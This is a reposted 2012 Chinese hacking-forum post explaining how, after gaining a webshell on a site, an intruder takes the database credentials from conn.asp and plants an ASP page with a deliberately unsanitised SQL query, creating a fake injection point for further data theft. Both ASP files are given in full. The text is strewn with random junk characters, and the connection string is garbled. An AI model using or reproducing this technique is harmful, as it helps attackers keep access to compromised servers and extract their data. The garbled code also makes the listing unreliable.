中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵
+ h( \2 N3 N6 ?9 X8 K0 \) R$ z6 n4 P4 o
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
; N# N8 e! u) ]& c$ U# N
, x/ h6 S2 i) F7 |1 a, L) @' `( j这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!  ^. G. ^8 ^7 G8 g6 L
& n* y% x1 b' H. W5 g( @
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和+ X) n' Y5 D1 v+ H: @; }) i1 f
2 T  `/ t7 Q9 x
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表! H# w( o( |4 n& e* n& j4 j6 _

2 t9 d! k7 b  k* G. R* z+ ~) m因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:9 Y/ u2 B% V  D* @

$ k7 Z& Y' M# t程序代码
: f% i! I: b# W$ G4 ~. s. X+ \/ q<!--#include file="xx.asp"-->
1 u/ N3 K. u. F! O* |<%
/ ~- x: O! m4 L0 }$ q0 O9 @set rs=server.createobject("ADODB.recordset")4 A6 G- J1 h& r& ^/ [% N2 W
id = request("id")2 g+ q$ w* T- \+ y9 x: ?
strSQL = "select * from admin where id=" & id
0 o3 ]: _0 }6 Y0 hrs.open strSQL,conn,1,3) g. W# U6 I. Q$ i
rs.close
5 K) v; j* n8 f%>
0 H9 w8 c! w* E) R- R& a/ N# m) N3 @0 w. Q1 g
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在& v3 [% p& ?7 @3 L; G

/ g: G/ B2 o! `& H, c你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!- U) G& X9 r* S: }8 T

+ Y. B7 {' T4 v2 S6 H5 A- w然后就要构造一个连接数据库的文件了,代码如下:( o/ w+ I* c/ \9 b( E
程序代码+ i) E, p( V5 J3 ?) a. g8 n/ U
<%        0 c5 O! _( z: N7 `; S& c
strSQLServerName = "000.000.000.000"     '服务器名称或地址
4 S  b6 ?: `& ]/ K& istrSQLDBUserName = "sqlname"         '数据库帐号
+ K( K0 {; g' ]. A( I( lstrSQLDBPassword = "sqlpass"         '数据库密码7 V  N; i" D' }4 c  o6 p
strSQLDBName = "sqldataname"           '数据库名称
# [. {! K) \0 G+ z( @- MSet conn = Server.CreateObject("ADODB.Connection")
; g2 L  N4 P, s0 _0 VstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"" o0 S1 _- y  m6 M
conn.open strCon3 u* u4 _+ J5 {5 ]. k  U
%>
8 U# ?. B& e2 Y1 |
1 x" i  p+ u9 h) k6 J4 K这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,) c" p% G+ ^* I) T8 ^- u$ s- Y
' O! S3 b& ~% G. E
就这样,正常情况下,就OK了,伪造成功……
0 d9 p0 t  _4 Z: i9 }3 O7 n: i+ Y8 l
. Y# ]1 v/ J. h& H/ T" o           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2